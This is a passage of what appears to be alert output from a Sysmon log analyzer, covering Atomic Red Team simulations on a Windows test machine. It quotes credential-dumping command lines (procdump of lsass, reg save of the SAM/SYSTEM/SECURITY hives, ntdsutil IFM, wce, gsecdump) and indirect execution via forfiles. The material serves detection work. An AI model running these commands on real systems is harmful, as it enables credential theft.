( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" ),1," 1 5 4 1 0 0x8000000000000000 4126 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.845 747F3D96-DD9E-5D31-0000-001059374B00 584 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4125 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.673 747F3D96-DD9E-5D31-0000-00109A2F4B00 264 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contain suspicious command ( procdump.exe),1," 1 5 4 1 0 0x8000000000000000 4124 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.626 747F3D96-DD9E-5D31-0000-00106E2C4B00 5488 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1," 1 5 4 1 0 0x8000000000000000 4124 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.626 747F3D96-DD9E-5D31-0000-00106E2C4B00 5488 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4123 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:26.535 747F3D96-DD9E-5D31-0000-0010CB274B00 3016 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1," 1 5 4 1 0 0x8000000000000000 4121 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:23.302 747F3D96-DD9B-5D31-0000-00106C1C4B00 7164 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1," 1 5 4 1 0 0x8000000000000000 4119 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:21.069 747F3D96-DD99-5D31-0000-001069A34A00 4080 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1," 1 5 4 1 0 0x8000000000000000 4117 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.211 747F3D96-DD95-5D31-0000-001075964A00 7140 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4116 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.139 747F3D96-DD95-5D31-0000-0010D6914A00 6264 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," 1 5 4 1 0 0x8000000000000000 4115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.097 747F3D96-DD95-5D31-0000-0010B38E4A00 5216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," 1 5 4 1 0 0x8000000000000000 4115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.097 747F3D96-DD95-5D31-0000-0010B38E4A00 5216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4114 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:17.016 747F3D96-DD95-5D31-0000-0010148A4A00 5476 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," 1 5 4 1 0 0x8000000000000000 4113 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:16.975 747F3D96-DD94-5D31-0000-0010F4864A00 3920 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "gsecdump -a" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," 1 5 4 1 0 0x8000000000000000 4113 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:16.975 747F3D96-DD94-5D31-0000-0010F4864A00 3920 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "gsecdump -a" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4111 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-19 15:11:03.652 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49744 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," 1 5 4 1 0 0x8000000000000000 4110 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:07.987 747F3D96-DD8B-5D31-0000-001094584A00 5792 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 4110 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:07.987 747F3D96-DD8B-5D31-0000-001094584A00 5792 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /user C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 4108 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:09:59.829 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell c:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-DD37-5D31-0000-00109D4C4900 5632 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," 1 5 4 1 0 0x8000000000000000 4108 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:09:59.829 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell c:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-DD37-5D31-0000-00109D4C4900 5632 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 4107 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:09:43.301 747F3D96-DD37-5D31-0000-00109D4C4900 5632 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D4B8-5D31-0000-0010A8CE0600 4416 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 4105 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-19 14:57:52.847 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49734 false 151.101.0.133 443 https ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4104 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:55.181 747F3D96-DA73-5D31-0000-001061933F00 1724 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1," 1 5 4 1 0 0x8000000000000000 4103 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:55.056 747F3D96-DA73-5D31-0000-0010918F3F00 4092 C:\Windows\System32\forfiles.exe 10.0.17763.1 (WinBuild.160101.0800) ForFiles - Executes a command on selected files Microsoft® Windows® Operating System Microsoft Corporation forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 747F3D96-DA73-5D31-0000-00106A8D3F00 1052 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1," 1 5 4 1 0 0x8000000000000000 4102 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:55.024 747F3D96-DA73-5D31-0000-00106A8D3F00 1052 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," 1 5 4 1 0 0x8000000000000000 4100 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:54.123 747F3D96-DA72-5D31-0000-001056513F00 3680 C:\Windows\System32\forfiles.exe 10.0.17763.1 (WinBuild.160101.0800) ForFiles - Executes a command on selected files Microsoft® Windows® Operating System Microsoft Corporation forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 